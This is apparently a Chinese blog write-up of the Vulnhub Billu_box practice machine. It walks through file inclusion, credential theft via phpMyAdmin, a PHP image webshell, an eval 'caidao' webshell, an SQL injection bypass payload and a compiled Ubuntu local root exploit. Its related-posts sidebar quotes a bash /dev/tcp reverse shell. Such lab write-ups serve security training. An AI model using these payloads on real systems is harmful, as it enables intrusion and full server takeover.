Vulnhub靶场渗透Billu_box

最新推荐文章于 2023-03-03 15:57:27 发布
最新推荐文章于 2023-03-03 15:57:27 发布
阅读量310 收藏
点赞数 2
分类专栏: Vulnhub渗透靶场学习 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120228144
版权
本文详述了一次靶机攻防演练的过程,从端口扫描、目录遍历到发现SQL注入、文件包含漏洞。利用phpmyadmin数据库获取登录凭证,构造图片马执行命令获取shell,最后通过Ubuntu本地提权脚本成功提权至root。总结了SQL注入的payload技巧和提权方法。
摘要由CSDN通过智能技术生成

靶机说明

难度中等
目标:从web应用程序获得 root权限
运行环境:靶机ip(192.168.110.127)攻击机kali(192.168.110.128)

信息收集

常规简单的端口扫描,目录扫描
在这里插入图片描述
在这里插入图片描述

漏洞挖掘

访问 80端口,打开提示是 SQL注入
在这里插入图片描述
简单万能密码试了一下不行,丢sqlmap也没跑出来暂时就不管他了
把上面扫出来的目录挨个打开

in.php 里面是 phpinfo()
add.php 是一个上传页面
phpmy 是 phpmyadmin登录页
test.php 是一个 测试页面,存在文件包含漏洞
在这里插入图片描述
没有传 file参数,经测试是 post传一个 file参数可以包含文件
在这里插入图片描述
就这样把扫到的文件全部下载下来了,哈哈哈
在这里插入图片描述
挨个查看找到了mysql的账号密码数据库名,还有一个用户
在这里插入图片描述
在这里插入图片描述

在上面找到的phpmyadmin登录数据库,可以找到最开始页面的登录账号密码
在这里插入图片描述
登录页可以直接传图片马 <?php system($_GET['cmd'])?>
在这里插入图片描述
可以正常执行,然后就是弹一个 shell出来了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里可以直接使用著名的 Ubuntu本地提权
在这里插入图片描述
在这里插入图片描述
为了方便把提权脚本传上去,先传个菜刀马echo '<?php eval($_POST[360]);?>' >> caidao.php
脚本成功上传,编译执行,成功提权 root
chmod 777 37292.c
gcc 37292.c -o exp
./exp
在这里插入图片描述
在这里插入图片描述

总结

在回到之前网页最开始提示的 SQL注入,看了 index.php后了解了过滤规则
所以 payload可以是' or 1=1 -- \'

文件上传 + 文件包含拿shell应该是靶机拿 shell常用的方法,还是要再练习熟练拿 shell

提权的方法可以多关注配置文件、数据库连接文件、用户文件、还有就是一些已知的漏洞本地提权

paidx0
关注
专栏目录
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1054
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
vulnhub(billu_b0x)实验
m0_49336519的博客
09-16 268
vulnhub(billu_b0x)实验 环境搭建 靶机下载地址 https://download.vulnhub.com/billu/Billu_b0x.zip 环境配置 1.靶机(billu_box) 2.攻击机(kali,win7) 3.靶机和攻击机都设置NAT模式 攻击演示 获取靶机IP 使用nmap扫描NAT网段上线的主机:nmap -sP 192.168.1.0/24 端口扫描 通过端口扫描发现服务器开放的服务信息 访问web站点 发现sql注入(靶机提示) sql注入测试 1.通过
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 732
海贼王渗透靶场
vulnhub-Billu_b0x(getshell成功)
qq_43006864的博客
03-29 1723
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟 上面一篇文章开始。 开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...
VulnHub实战篇一:Billu_Box靶机渗透记录
a1004070060的博客
03-31 1798
0x00前言 由于2020年疫情原因,被迫宅家已有两个月之久,假期里边摸鱼边学习也浪费了不少时光。感叹光阴似箭的同时,临近毕业也加倍地感受到就业的压力。最近听了某位OSCP大佬的安利,决定开始拿VulnHub练练手。 本系列文章用来记录VulnHunb靶机的渗透过程,欢迎各位师傅讨论学习。 0x01靶机信息 靶机名称:Billu_b0x 下载地址:https://downloa...
billu_b0x靶场通关
最新发布
tpaer的博客
03-03 773
billu_box靶场通关
VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1091
该靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
Billu_box渗透测试
Darklord.W
04-11 832
Billu_box渗透测试 0x00实验环境 靶机:Billu_boxIP地址:192.168.8.207 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan 及nmap扫描 进入web界面 首先,扫描web目录: 得到:...
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 429
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 408
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1154
vulnhub ai-web1.0
Billu_box靶场实战演练
weixin_52049485的博客
01-05 667
部署环境 虚拟机:Kali ip:192.168.202.138 靶机:Billu_box ip:192.168.202.140 信息收集 1、通过nmap扫描发现靶机 ip地址:192.168.202.140 开放了22、80端口 中间件:Apache/2.2.22 (Ubuntu) 操作系统:Linux 2、通过Kali自带的DIRB工具+字典扫描目录 漏洞发现 通过目录扫描发现了phpinfo** phpmyadmin界面,注意的是扫描目录为“phpmy” 发现“file”内容的网址,发现任意
渗透练习 Vulnhub靶场 Tornado
hljzzj的博客
02-15 2178
No.27 Tornado 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-tornado,639/ 靶场: VulnHub.com 靶机名称: IA: Tornado 难度: 中等 发布时间: 2020年12月20日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -
【甄选靶场Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)
人间体佐菲的博客
10-02 1293
Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权) 信息安全,网络安全渗透测试
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1627
vulnhub靶机AI-Web-1.0渗透笔记
web狗日记之vulnhub-JIS靶场
梦之序章的博客
04-10 749
web狗日记 4月10日 晴 今天在vulnhub下载了个靶场,被领导看见了,我急忙解释是用来消磨时间的,领导微微一笑对我说:有时间的人不适合做渗透。 咳咳,其实本人也不怎么打ctf,只是最近该准备的也差不多了,拿一些靶场临阵磨磨枪。之前没打过vulnhub的,所以随便找了个不是那么无情的靶场试试看。入正题先: 在vunlhub官网下载后,ovf导入vmware中,我第一次导入没有分配ip。这个解...
vulnhub_内网渗透测试的记录——网络安全
yz_weixiao的博客
01-03 561
这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。
vulnhub靶场AI-WEB-1.0
qq_42307546的博客
05-03 623
靶机下载地址 https://download.vulnhub.com/aiweb/AI-Web-1.0.7z 主机探测 netdiscover -i eth0 -r 192.168.1.0/24 端口探测 nmap -p 1-65535 -sC -sV 192.168.1.14 开启了80端口访问 web目录爆破 gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-m
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7795
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
入门靶场Billu_b0x:Web渗透学习与实践
"Billu_b0x靶机练习是一个适合初学者的Web渗透入门实践,旨在帮助用户了解基本的Web渗透流程。通过该靶场,用户可以锻炼自己的技能,包括主机发现、端口扫描和信息收集等。文章作者作为小白,分享了其学习过程中的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值